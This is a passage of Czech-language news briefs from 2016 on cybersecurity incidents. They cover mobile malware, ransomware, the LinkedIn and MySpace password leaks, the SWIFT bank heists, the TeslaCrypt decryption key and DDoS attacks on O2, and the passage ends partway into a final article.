Podle něj představuje velké riziko také druhá objevená zranitelnost. „Ta umožňuje vzdálenému útočníkovi smazat nebo upravit přijaté SMS zprávy na zařízení. Tento postup by mohl být zneužit například jako součást phishingového útoku a krádežím přihlašovacích údajů nebo k instalaci škodlivých aplikací,“ doplnil Řeháček.
Bezpečnostní experti nicméně upozornili na obě zranitelnosti společnost LG ještě před jejich odhalením. V současnosti jsou tak pro chyby již k dispozici záplaty, které lidé mohou ve svých mobilních přístrojích stahovat prostřednictvím automatických aktualizací systému.
S ohledem na možná rizika by uživatelé s instalací rozhodně neměli otálet.
Škodlivých kódů pro mobily přibývá
V posledních měsících se zaměřují počítačoví piráti na mobilní zařízení stále častěji. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl Řeháček.
Podle něj dělá bezpečnostním expertům v současnosti velké vrásky na čele především hrozba zvaná HummingBad.
HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.
Vyděračských webů s ransomwarem přibývá, za první čtvrtletí o 3500 procent
27.7.2016 Viry
Závratný nárůst počtu nebezpečných internetových stránek, v nichž se skrývá vyděračský vir ransomware, který zašifruje obsah počítače, a jeho tvůrce žádá po uživateli výkupné, zaznamenala americká bezpečnostní společnost Infoblox.
Z jejího pravidelného výzkumu Threat Infoblox DNS Index vyplývá, že jen za první čtvrtletí letošního roku vzrostl počet internetových domén zneužitých ransomwarem oproti poslednímu kvartálu 2015 o rekordních 3500 procent. Útočníci se přitom začali stále více zaměřovat na firmy, u kterých vytušili větší šanci získat výkupné.
Neplaťte útočníkům výkupné, motivuje je to k dalším útokům.
Petr Šnajdr, bezpečnostní expert společnosti ESET
„Došlo k seismickému nárůstu hrozeb ransomwaru, které se posouvají od běžných uživatelů internetu, od nichž útočníci mohou získat výkupné v řádu několika dolarů, k firmám všech velikostí, včetně těch největších. Náš index hrozeb ukazuje, že kyber zločinci chtějí ve velkém měřítku využít právě této příležitosti,“ říká viceprezident společnosti Infoblox Rod Rasmussen.
Útoky ransomwaru se nesoustředí pouze na počítače nebo notebooky. Antivirová společnost ESET již začátkem letošního roku upozornila na výrazný nárůst případů ransomware útoků na mobilní zařízení s operačním systémem Android. Hrozba se nevyhýbá ani zařízením společnosti Apple s operačním systémem iOS X.
Jakmile je zařízení infikováno ransomwarem, nemá uživatel prakticky žádnou šanci je odblokovat. Za klíč, který by je odšifroval, musí útočníkům zaplatit. Neexistuje však žádná záruka, že po zaplacení budou zablokované soubory nebo celé zařízení opravdu dešifrovány. Bezpečnostní experti se proto shodují, že útočníkům by se výkupné platit nemělo.
„Motivuje je to k dalším útokům. Pokud by jim lidé neplatili a řádně si zálohovali data, útočníci by ztratili potřebu šířit ransomware,“ vysvětluje Petr Šnajdr, bezpečnostní expert společnosti ESET. Externí disk pro zálohu dat však nesmí být dlouhodobě připojen k zařízení, jehož prostřednictvím se uživatel připojuje k internetu, jinak by mohly být zálohované soubory rovněž zašifrovány.
Lidé by neměli bezhlavě otevírat přílohy
Ransomware se často šíří formou příloh nevyžádaných e-mailů nebo využívá chyb v programech Adobe Flash či Java. Stačí tedy, aby uživatel navštívil stránku s infikovanou reklamou ve Flashi a neměl tento program aktualizovaný, a bude přesměrován na web, z něhož se mu do zařízení stáhne a instaluje ransomware.
„Lidé by neměli bezhlavě otevírat přílohy e-mailů, které je vyzývají k platbě údajných pohledávek, ani klikat na podezřelé odkazy na internetových stránkách. Zejména ve firmách by zaměstnanci měli pravidelně podstupovat bezpečnostní školení, protože riziko, že útočník pronikne do firemní sítě, a firma přijde o velké množství citlivých dat, je opravdu veliké,“ upozorňuje Petr Šnajdr.
Nejvíce škodlivých webů s ransomwarem se podle výzkumu Threat Infoblox DNS Index aktuálně objevuje ve Spojených státech (41 procent). Následuje Portugalsko (17 procent), Rusko (12 procent), Nizozemí (10 procent), Velká Británie (8 procent) a Island (6 procent).
Tvůrce bankovního viru Gozi odsouzen k pokutě sedm miliónů dolarů
27.7.2016 Viry
Téměř sedm miliónů dolarů (175 miliónů korun) má zaplatit hacker Nikita Kuzmin, který v roce 2007 vytvořil a použil jeden z prvních bankovních počítačových virů Gozi zaměřených na prolamování bankovních účtů.
Rozhodl o tom soud v New Yorku, který už dříve Kuzminovi uložil trest 37 měsíců veřejně prospěšných prací. Mladík, který pochází z Ruska, byl dopaden v roce 2011 a ke svým činům se doznal.
Škodlivý kód Gozi napadl milióny počítačů po celém světě a způsobil škody ve výši několika desítek miliónů dolarů. Ve své době si s ním neuměly poradit ani antivirové programy.
Kromě toho Kuzmin jako jeden z prvních kyberzločinců začal své služby a vybudovanou infrastrukturu pronajímat dalším hackerům. Účtoval si za to poplatek 500 dolarů týdně (téměř 13 tisíc korun) v digitální měně WebMoney. Zprostředkovával tak krádeže dat i finančních prostředků dalším kriminálníkům.
Díky dvoufaktorové autentizaci je pro hackery mnohem těžší kompromitovat bankovní účty.
Martin Skýpala, produktový specialista společnosti ESET
Nikita Kuzmin svým „klientům“ nabízel přístup ke konkrétním bankovním ústavům a umožňoval jim provádět kybernetické útoky. Na těchto aktivitách vydělal nejméně 250 tisíc dolarů (přes šest miliónů korun). Po dopadení u něj vyšetřovatelé zajistili počítač se záznamy o 10 tisících prolomených bankovních účtech od 5200 uživatelů počítačů včetně přihlašovacích údajů do více než 300 bank po celém světě.
V Kuzminově případu je obviněn i rumunský hacker Mihai Ionut Paunescu, který mu poskytoval „neprůstřelný“ hosting a čeká se na jeho vydání do Spojených států.
„Díky plošnému zavedení dvoufaktorové autentizace do internetového bankovnictví je pro hackery mnohem těžší kompromitovat bankovní účty než dříve. Pokud se jim však povede infikovat počítač a pomocí technik sociálního inženýrství i mobilní zařízení uživatele, je cesta volná,“ říká Martin Skýpala, produktový specialista společnosti ESET.
Proto je velmi důležité používat pravidelně aktualizované bezpečnostní řešení a veškerou komunikaci s bankou (e-mail, internet) pečlivě ověřovat.
Olympiáda nahrává počítačovým pirátům
27.7.2016 Zdroj:
Už za dva měsíce odstartují letní olympijské hry v Riu de Janeiru. Právě nedočkaví sportovní fanoušci by se ale měli mít na pozoru, protože na ně na internetu v poslední době líčí pasti počítačoví piráti. Snaží se tak vylákat citlivé údaje i propašovat škodlivé kódy do cizích počítačů.
Na rostoucí riziko kybernetických útoků v souvislosti s hrami v Riu upozornili bezpečnostní experti z antivirové společnosti Kaspersky Lab. Ti zachytili první nevyžádané e-maily už v minulém roce, v posledních týdnech ale počet rozeslaných spamů stoupá.
Nejčastěji se kyberzločinci snaží důvěřivce nalákat na výhru vstupenek v soutěži, kterou organizovaly Mezinárodní olympijský výbor a brazilská vláda. Tvrdí, že právě jejich e-mail byl náhodně vybrán z obřího seznamu účastníků.
Ve spamové zprávě se nachází odkaz na formulář, který je nutné k převzetí „ceny“ vyplnit. Pokud to uživatelé skutečně udělají, nevědomky tak poskytnou počítačovým pirátům všechny citlivé údaje.
Podezřele levné vstupenky
Ještě větší riziko nicméně představují nejrůznější podvodné weby, které nabízejí vstupenky na olympiádu za podezřele nízkou cenu. Na nich totiž podvodníci vyzývají uživatele, aby v informacích o objednávce vyplnili také údaje o své platební kartě.
Tím pochopitelně dají kyberzločincům do rukou vše, co potřebují, aby mohli lidem vybílit bankovní účet.
Počítačoví piráti jsou dokonce tak vynalézaví, že objednávku potvrdí své oběti do e-mailu s tím, že samotné lístky dorazí za dva až tři týdny. Uživatelé tak mohou nabýt falešného pocitu bezpečí, ve skutečnosti ale nechají podvodníkům dostatek času, aby mohli účet vybílit.
Před weby nabízejícími až podezřele levné vstupenky a před nevyžádanými zprávami týkajícími se olympijských her by se tedy měli mít uživatelé na pozoru.
V Rusku zadrželi desítky hackerů, měli ukrást přes 600 miliónů
27.7.2016 Zákony
V Rusku bylo za počítačovou kriminalitu zatčeno 50 lidí, kteří jsou podezřelí, že s pomocí nezákonných počítačových operací ukradli 1,7 miliardy rublů (615 miliónů Kč). Informovala o tom agentura Interfax. Podle ní se zátahů na členy gangu na 80 místech v 15 oblastech Ruska podílelo ministerstvo vnitra a Federální bezpečnostní služba (FSB).
Osmnácti zadrženým bylo zamítnuto propuštění na kauci, další tři byli umístěni do domácího vězení. Všichni byli obviněni z vytvoření, šíření a používání nezákonných počítačových programů.
Policie zabavila počítače a komunikační zařízení, bankovní karty, finanční dokumenty a velké sumy peněz. Podle Interfaxu vyšetřování ještě pokračuje.
FSB oznámila, že zadržené osoby kradly peníze z ruských finančních institucí.
Největší hackerský útok potvrzen. V ohrožení jsou stovky miliónů uživatelů
27.7.2016 Hacking
Víc než 400 miliónů hesel, která se od pondělí nabízela na internetovém černém trhu, jsou podle všeho pravá. Ve středu to potvrdili zástupci sociální sítě MySpace, ze které mají odcizená data pocházet. Upozornil na to server The Hacker Hews. Přestože MySpace dnes již nepatří mezi ty nejpopulárnější, nebezpečí spočívá v tom, že řada uživatelů používá stejné přístupové údaje i k dalším službám.
Útok na MySpace se měl konat už v roce 2013. Že se hackerovi nebo neznámé skupince hackerů podařilo odcizit stovky miliónů přístupových údajů, se však ukázalo až tento týden.
Hacker vystupující pod přezdívkou Peace totiž obrovský balík přihlašovacích údajů nabídl k prodeji na černém trhu. Požadoval za ně šest bitcoinů, tedy v přepočtu za bezmála 70 tisíc korun. Zmiňovanou virtuální měnu nezvolil hacker náhodou – nelze ji totiž snadno vystopovat, a tak i po zaplacení zůstane jeho identita nadále skryta.
Účty mohou být kompromitovány.
„Jsme přesvědčeni, že nejde o podvrh a že v roce 2013 nebo někdy dříve skutečně došlo k narušení bezpečnosti. Účty z tohoto roku a starší tedy mohou být kompromitovány,“ varovali zástupci sociální sítě.
V současnosti server MySpace používá jen několik desítek miliónů uživatelů, před lety však byla její popularita daleko větší. Zástupci sociální sítě se chlubí tím, že má miliardu registrovaných uživatelů.
A právě to představuje podle bezpečnostních expertů velký problém. V ohrožení jsou totiž i uživatelé, kteří svůj účet již dávno nepoužívají. Celá řada lidí totiž používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.
Databáze s přihlašovacími údaji tak může představovat pro uživatele potenciální riziko i přesto, že útok proběhl před třemi lety.
Nejde o ojedinělý útok
V celé historii internetu není zaznamenán případ, kdy by se podařilo jedinému hackerovi nebo skupince počítačových pirátů odcizit tak velké množství hesel, než nyní v případě sociální sítě MySpace.
Na internetovém černém trhu se sice nabízely ještě větší balíky hesel, vždy se však nakonec ukázalo, že jde o podvrh.
V posledních týdnech jde už o třetí velký únik hesel, na který se přišlo. Na černém internetovém trhu se nejprve v polovině května objevil balík 167 miliónů hesel z profesní sítě LinkedIn, pak 65 miliónů přihlašovacích údajů ze sítě Tumblr.
Pozor na jednoduchá hesla
Únik dat ze sítě MySpace jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla, ale alespoň jednou za pár měsíců je pravidelně měnit.
Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.
Zaznamenali jsme desítky hackerských útoků, přiznala americká centrální banka
27.7.2016 Hacking
Více než pět desítek případů narušení kybernetické bezpečnosti řešili v uplynulých letech bezpečnostní experti americké centrální banky (Fed). Podle interního vyšetřování za nimi stáli hackeři či zpravodajci. Upozornila na to agentura Reuters.
Všechny útoky jsou popsány v dokumentu, který si agentura Reuters vyžádala na základě zákona o svobodném přístupu k informacím. Zástupci Fedu však jednotlivé případy oficiálně nechtěli komentovat.
Ze zveřejněných dat tak bohužel není jasné, zda se během útoků podařilo hackerům či zpravodajcům odcizit nějaké peníze či citlivé údaje jednotlivých klientů. Jisté je nicméně to, že útočníci dokázali zabezpečení banky překonat a dostat se do jejích systémů. Jinými slovy – minimálně v případě zpravodajců – mohlo jít o špionáž.
Všechny útoky se měly odehrát mezi lety 2011 a 2015, zástupci banky o nich informovali až nyní v dokumentu připraveném pro agenturu Reuters.
Ve hře jsou stovky miliónů
Zprávy o kybernetických útocích na Fed přicházejí jen pár týdnů poté, co se ukázalo, že zatím neznámí hackeři připravili banky o stovky miliónů korun.
Například z účtu bangladéšské centrální banky, který je vedený právě u Fedu, zmizelo loni 81 miliónů dolarů, tedy v přepočtu více než 1,9 miliardy korun.
Ekvádorská banka Banco del Austro (BDA) pak v květnu uvedla, že měla během útoku přijít o 12 miliónů dolarů (bezmála 290 miliónů korun).
K penězům se dostali snadno
K penězům se přitom počítačoví piráti dostali v obou případech až neuvěřitelně snadno, způsob provedení byl při obou útocích do posledního puntíku stejný. Nejprve do počítačů v bance propašovali viry, díky kterým získali přístupové kódy do SWIFT systému.
Ve virtuálním světě jedniček a nul je to stejné jako získat klíče od bankovního trezoru. SWIFT systém totiž jednotlivé banky využívají jako bezpečnostní standard k ověřování transferů mezi sebou. Pomocí něj jsou schopny získat jakési podpisové klíče, na základě kterých se pak identifikuje jedna finanční instituce před druhou klidně i na druhém konci planety. Zjednodušeně řečeno, banky se takto při komunikaci poznají.
A právě toho využili kyberzločinci. Po získání kódů do SWIFT systému začali pomalu provádět jednu platbu za druhou. Aby nebyla jejich činnost příliš nápadná, převáděli jen něco málo přes milión dolarů denně. Tak si jejich práce nevšimli zaměstnanci banky několik dní.
Ani při jednom ze zmiňovaných útoků se nepodařilo počítačové piráty vypátrat.
Clintonová používáním soukromého mailu porušila vládní pravidla
27.7.2016 Zabezpečení
Hillary Clintonová porušila vládní pravidla, když jako někdejší šéfka americké diplomacie používala pro pracovní účely svůj soukromý e-mail. Oznámila to inspekce ministerstva zahraničí, uvedla agentura Reuters. Zpráva inspekce, která je vůbec prvním zveřejněným oficiálním auditem, kritizuje nejen Clintonovou, ale i ministerstvo za dřívější nedostatky v uchovávání záznamů. Případem se kvůli možnému neoprávněnému využívání soukromého e-mailu zabývá i Federální úřad pro vyšetřování (FBI).
Inspekce zjistila, že pokud by tehdejší ministryně a nynější favoritka na demokratickou prezidentskou nominaci požádala na příslušném oddělení zabývajícím se elektronickou bezpečností o svolení používat soukromý e-mail, tak by ho nedostala. Zpráva také podkopává argumenty někdejší šéfky diplomacie, kterými hájí využívání soukromého poštovního serveru ve svém domě. Mimo jiné dříve uvedla, že to bylo běžnou praxí a že žádné svolení nepotřebovala, i tak se ale omluvila.
Ministerstvo zahraničí v reakci na zjištění kontroly uvedlo, že představitelé úřadu o soukromém e-mailu Clintonové používaném pro pracovní účely sice věděli, neznali ale plný rozsah jeho nasazení. Mluvčí ministerstva Mark Toner podle Reuters řekl, že úřad již vyhověl řadě doporučení, která inspekce ve zprávě učinila.
Clintonová podle vyšetřovatelů přes soukromý e-mail odeslala nebo přijala řadu tajných informací, přestože podle vládních nařízení podobnou poštu lze rozesílat jen přes bezpečnostně zajištěné kanály. Exministryně ale tvrdí, že její pošta žádná utajovaná data neobsahovala. V případu už byli vyslechnuti někteří její spolupracovníci, sama pak FBI přislíbila spolupráci.
Dávné problémy
Inspekce rovněž tvrdí, že ministerstvo zahraničí se potýkalo dávno před nástupem Clintonové s dlouhodobými a systémovými nedostatky s uchováváním dat. Úřad například nezachoval některou elektronickou korespondenci někdejších ministrů zahraničí. To ministerstvo uznává.
Předpokládaný republikánský prezidentský kandidát Donald Trump svou očekávanou demokratickou soupeřku v komentáři k auditu kritizoval.
Statisíce lidí používají na webu heslo 123456. Vystavují se riziku
27.7.2016 Zabezpečení
Bezpečnostní experti neustále uživatele varují, jak důležité je vytvářet k různým on-line službám důmyslná hesla, která kyberzločinci jen tak snadno neodhalí. Přesto si s touto problematikou příliš uživatelů hlavu neláme. Jak upozornil bezpečnostní výzkumník Brian Krebs, statisíce lidí stále používají primitivní heslo 123456.
Žebříček nejpoužívanějších hesel bezpečnostní výzkumníci sestavili z desítek miliónů přihlašovacích údajů, které unikly z profesní sítě LinkedIn. Útok se sice stal již v roce 2012, všechna odcizená hesla však byla zveřejněna až letos v květnu.
Absolutně nejpoužívanějším heslem je číselná kombinace 123456, kterou používalo 753 305 uživatelů služby LinkedIn. Je zřejmé, že po sobě jdoucích šest číslovek ale lidé používají i na jiných webech. V seznamu nejpoužívanějších hesel totiž vévodilo heslo 123456 už v nedávném žebříčku společnosti Splash Data.
Číselné kombinace jsou v módě
Z aktuálních dat z profesní sítě LinkedIn je nicméně patrné, že číselné kombinace jsou opravdu velmi populární. V různých kombinacích je totiž používají statisíce dalších lidí. Jak je vidět v tabulce níže, po sobě heslo složené pouze z číslovek se v žebříčku 15 nejpoužívanějších hesel objevilo hned několikrát.
Druhým nejrozšířenějším heslem se pak stalo slovo linkedin, tedy samotný název profesní sítě, ze které přihlašovací údaje unikly. Třetí příčka pak patří opět nepříliš originálnímu slovu password, což v překladu znamená jednoduše heslo.
Hesla nepodceňovat
Podceňovat hesla na internetu se přitom nemusí vyplatit. Zpravidla jsou totiž první linií účinné ochrany před odcizením citlivých osobních dat, například pro on-line bankovnictví nebo platby na internetu. S rozšířením notebooků, tabletů a chytrých telefonů navíc lidé provádějí peněžní transakce on-line stále častěji.
Navíc pokud takto jednoduché heslo používají lidé k zabezpečení svého e-mailu, snadno dají útočníkovi přístup k drtivé většině svých internetových služeb. Právě poštovní schránky se totiž využívají k případným obnovám hesla, pokud je zapomenete. A přesně takto může postupovat i počítačový pirát.
Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo), nebo pouhou posloupností číslic.
Nejpoužívanější hesla na internetu
1. 123456
2. linkedin
3. password
4. 123456789
5. 12345678
6. 111111
7. 1234567
8. sunshine
9. qwerty
10. 654321
11. 000000
12. password1
13. abc123
14. charlie
15. linked
Zdroj: Uniklá hesla ze služby LinkedIn/LeakedSource
Počítačoví piráti se omluvili za šíření vyděračského viru. Data je možné odemknout zadarmo
27.7.2016 Viry
Velmi netradiční zvrat nastal v případě počítačových pirátů, kteří šířili po internetu vyděračské viry. Ti se patrně nemohli už koukat na zkázu, kterou napáchal, a tak se jej rozhodli odstřihnout. Všem uživatelům se navíc omluvili. Upozornil na to server Bleeping Computer.
Jak se bránit proti vyděračským virům?
„Projekt končí, moc se všem omlouváme,“ uvedli neznámí kyberzločinci, kteří šířili po internetu vyděračský virus TeslaCrypt. Aby dokázali, že svou omluvu myslí skutečně vážně, připojili k ní také hlavní dešifrovací klíč. S jeho pomocí je možné zašifrovaná data odemknout i bez placení výkupného.
Sluší se však podotknout, že vyděračských virů existuje přinejmenším několik desítek různých druhů. Univerzální klíč přitom funguje pouze na již zmiňovaný TeslaCrypt.
Kyberzločinci se k nečekanému kroku podle všeho odhodlali díky jednomu bezpečnostnímu výzkumníkovi z antivirové společnosti Eset. Ten je anonymně kontaktoval přes oficiální kanál určený obětem vyděračského viru a požádal o zveřejnění univerzálního dešifrovacího klíče. Sám přitom patrně nečekal, že budou počítačoví piráti tak vstřícní.
Na základě toho vytvořili pracovníci Esetu dešifrovací nástroj, s jehož pomocí je možné uzamčená data na pevném disku snadno odemknout. Stahovat jej je možné zdarma zde.
Jak útočí vyděračské viry
Na napadeném stroji dokážou vyděračské viry udělat pěkný nepořádek. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.
Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné. V případě škodlivého kódu TeslaCrypt to však už nyní neplatí.
Z banky ukradli hackeři stovky miliónů. Deset dní si jich nikdo nevšímal
27.7.2016 Kriminalita
Z amerických akčních filmových trháků by se dalo usuzovat, že velké banky patří k nejstřeženějším místům na této planetě a že si každý musí okamžitě všimnout byť jen jediného chybějícího dolaru. Opak je ale pravdou, jak dokazuje nově zmapovaný hackerský útok na ekvádorskou banku. Při něm si nikdo počítačových pirátů nevšímal dlouhých deset dní, díky čemuž si přišli na několik stovek miliónů korun.
Útok na banku Banco del Austro (BDA) se odehrál už v lednu 2015. Samotná banka o něm ale oficiálně informovala až nyní, v rámci žaloby se totiž domáhá ukradených stamiliónů zpět. Právě díky tomu se podařilo celý hackerský útok zmapovat, uvedla v pátek agentura Reuters.
Hackeři odcizili z BDA minimálně 12 miliónů dolarů, tedy v přepočtu bezmála 290 miliónů korun. K penězům se dostali až neuvěřitelně snadno. Nejprve do počítačů ve zmiňované finanční instituci propašovali viry, díky kterým získali přístupové kódy do SWIFT systému.
Je to stejné jako získat klíče od bankovního trezoru.
Ve virtuálním světě jedniček a nul je to stejné jako získat klíče od bankovního trezoru. SWIFT systém totiž jednotlivé banky využívají jako bezpečnostní standard k ověřování transferů mezi sebou. Pomocí něj jsou schopny získat jakési podpisové klíče, na základě kterých se pak identifikuje jedna finanční instituce před druhou klidně i na druhém konci planety. Zjednodušeně řečeno, banky se takto při komunikaci poznají.
A právě toho využili kyberzločinci. Po získání kódů do SWIFT systému začali pomalu provádět jednu platbu za druhou. Aby nebyla jejich činnost příliš nápadná, převáděli jen něco málo přes milión dolarů denně.
Patrně i kvůli tomu si pracovníci banky okamžitě nevšimli, že je něco v nepořádku. Jak upozornil server The Hacker News, zarazit neoprávněné transakce počítačovým pirátům se podařilo až po deseti dnech od prvního převodu. I to lze ale považovat za úspěch, protože v opačném případě by si hackeři odnesli ještě více.
Ukradené peníze chtějí zpět
Zástupci ekvádorské banky se však s tímto konstatováním patrně nechtějí smířit a své peníze požadují zpět. Protože se jim za více než rok nepodařilo peníze ani hackery vypátrat, chtějí své štěstí zkusit u soudu.
Zažalovali proto Wells Fargo – jednu z největších amerických bank. Právě z ní vylákali počítačoví piráti díky přístupu do SWIFT systému milióny dolarů, protože zde BDA má vedený účet. Zástupci BDA v žalobě tvrdí, že si „bankéři z Wells Fargo měli všimnout podezřelých transakcí“.
Wells Fargo však jakoukoliv vinu odmítá. V prohlášení pro agenturu Reuters v pátek zástupci americké banky prohlásili, že všechny „transakce byly provedeny podle pokynů přijatých přes ověřený SWIFT systém“.
Zatímco se banky dohadují, hackeři se mohou patrně radovat. Po měsících stopa vychladla a milióny dolarů byly postupně přeposílány a následně i vybrány přes banky v různých koutech světa.
Ztratilo se už 81 miliónů dolarů
Vše navíc nasvědčuje tomu, že se počítačové piráty nepodaří jen tak vypátrat. Podobným způsobem si totiž přišli také na 81 miliónů dolarů (1,9 miliardy Kč) z účtu bangladéšské centrální banky, vedeného u Federální rezervní banky (Fed) v New Yorku.
Při tomto útoku se také nabourali do SWIFT systému pomocí škodlivého kódu. Vyšetřování této velké bankovní loupeže letos v dubnu navíc ukázalo, že bankéři nepoužívali firewall. Jinými slovy tak hackerům banka naservírovala peníze doslova na zlatém podnosu.
Podle vyšetřovatelů bylo zřejmé, že se lidé starající o miliardové transakce snažili ušetřit. Další síťová technika, kterou vyšetřovatelé kontrolovali, totiž byla pořízena z druhé ruky. Například nákupem síťových přepínačů z bazaru přitom banka ušetřila maximálně tak pár stovek dolarů.
LinkedIn narychlo mění hesla. Čtyři roky po útoku
27.7.2016 Zabezpečení
Desítky miliónů uživatelských jmen a hesel, která hacker nabízí k prodeji na internetu, jsou podle všeho pravá. Zástupci profesní sítě LinkedIn totiž začali uživatelům narychlo měnit hesla. A to i přesto, že se útok stal už před čtyřmi roky.
Jak postupovat při změně hesla na LinkedIn:
:: Navštivte web LinkedIn nebo běžte do mobilní aplikace.
:: Jste-li přihlášeni, odhlaste se.
:: Znovu se přihlaste a postupujte podle instrukcí ke změně hesla.
pátek 20. května 2016, 8:54
„V nedávné době jsme zaznamenali potenciální riziko pro váš účet na LinkedInu a přijali jsme okamžitá opatření na ochranu vašeho účtu. Při příštím přihlášení si budete muset změnit heslo,“ konstatovali zástupci sítě LinkedIn.
E-mail v tomto znění obdržely během čtvrtka a pátku milióny uživatelů zmiňované profesní sítě. Mezi ohroženými uživateli jsou i Češi.
Odcizená uživatelská data mají pocházet z útoku z roku 2012. Tehdy se však předpokládalo, že z LinkedInu uniklo méně než 6,5 miliónu hesel. Tento týden ve čtvrtek se však ukázalo, že jich je mnohem víc.
Hacker chce 50 000 korun
Hacker vystupující pod přezdívkou Peace totiž na černém internetovém trhu začal prodávat databázi obsahující na 167 miliónů hesel. Požaduje za ni pět bitcoinů, tedy v přepočtu zhruba padesát tisíc korun.
Testy na vzorku uživatelských dat, která hacker nabízí jako ukázku, prokázaly, že odcizená hesla jsou pravá. Právě proto začali zástupci LinkedInu narychlo resetovat uživatelům hesla, přestože se útok udál už před čtyřmi lety.
Databáze může představovat pro uživatele potenciální riziko i po změně hesla. Celá řada lidí totiž používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.
V případě, že lidé používají totožná hesla jako k síti LinkedIn i na jiných webových službách, je vhodné je změnit samozřejmě i tam.
O2 čelí masivním útokům hackerů. Kvůli hokejovému mistrovství
27.7.2016 Počítačový útok
Již několik dní čelí společnost O2 masivním útokům hackerů. Ti se snaží z velkého množství přistupovat na servery O2 a tím je vyřadit z provozu. Právě v souvislosti s DDoS útoky nastal ve čtvrtek výpadek pevného internetu tohoto operátora (vdsl a adsl).
Co je DDoS
Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
„Hackeři zaútočili ve čtvrtek na streamovací servery O2. Jedná se již o několikátý útok od začátku hokejového šampionátu, který zapříčinil technické problémy při online vysílání hokejového zápasu Česka proti USA a několikaminutové problémy s přihlášením k mobilní službě O2 TV,“ uvedla Kateřina Mikšovská z tiskového oddělení O2.
První útoky nastaly už minulý týden. "Přesto jsme byli minulý čtvrtek schopni poskytnout službu 320 tisícům zákazníků a přenést rekordní objem 237 Gbps,“ prohlásil Václav Hanousek, šéf síťového provozu.
Výpadky se prý mohly dotknout také diváků iVysílání. „Intenzita a rozsah útoků vedly k přetížení serverů mobilní televize O2 TV. Krátké výpadky mohli bohužel zaznamenat také diváci, kteří hokejový zápas sledovali prostřednictvím iVysílání. Výpadky se však netýkaly všech uživatelů webu České televize, bez jakýchkoli problémů mohlo zápas sledovat téměř 300 tisíc lidí,“ konstatovala Mikšovská.
Výpadek pevného internetu
Právě kvůli snaze zabránit hackerům v úspěšném útoku bylo v pondělí vyřazeno internetové připojení v Praze a středních Čechách. Výpadek trval více než 1,5 hodiny, jak Novinky.cz informovaly již dříve.
„Opatření, které jsme na ochranu služby poskytované našim zákazníkům přijali, bohužel vlivem systémové chyby způsobily dnešní výpadek na pevném internetu," konstatoval Hanousek.
Hackerský útok nyní bude řešit policie. „Operátor O2 se již s případem pirátských útoků obrátil na orgány činné v trestním řízení,“ doplnila Mikšovská.
Hacker nabízí k prodeji 167 miliónů hesel ze sítě LinkedIn
27.7.2016 ¨Sociální sítě
Hacker vystupující pod přezdívkou Peace nabízí na černém trhu ke koupi na 167 miliónů přihlašovacích údajů k profesní síti LinkedIn. Požaduje za ně pět bitcoinů, tedy v přepočtu zhruba padesát tisíc korun. Upozornil na to server The Hacker News.
Uživatelská data mají pocházet z útoku, který se stal už v roce 2012. Tehdy o něm informovaly i Novinky.cz.
Původně se přitom předpokládalo, že ze sítě LinkedIn bylo odcizeno méně než 6,5 miliónu hesel. Jak ale ukazuje nabídka hackera, bylo jich pravděpodobně daleko více.
Hacker postupuje obezřetně
Peace dokonce zveřejnil část databáze, aby případným kupcům ukázal, že nejde o podvrh. To ale samozřejmě nikdo nedokáže dopředu potvrdit, pokud nebude mít k detailní analýze databázi se všemi přihlašovacími údaji.
Jisté je nicméně to, že hacker postupuje velmi obezřetně. Virtuální měnu bitcoin totiž nelze snadno vystopovat, a tak i po zaplacení zůstane jeho identita nadále skryta.
Zástupci profesní sítě LinkedIn se nechali slyšet, že celý incident již prošetřují. Žádné oficiální vyjádření však zatím nevydali.
Riziko i po letech
Databáze může představovat pro uživatele potenciální riziko i přesto, že útok proběhl před čtyřmi lety. LinkedIn sice v roce 2012 hesla uživatelům resetovala, ale celá řada lidí používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.
Únik dat ze sítě LinkedIn jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla, ale alespoň jednou za pár měsíců je pravidelně měnit.
Hackeři zotročili milión počítačů. Vydělávali tak velké peníze
27.7.2016 Hacking
Skupině zatím neznámých hackerů se podařilo infikovat virem na milión počítačů z různých koutů světa. Přestože jejich majitelé o tom neměli ani tušení, s pomocí jejich PC pak vydělávali velké peníze. Upozornil na to server The Hacker News.
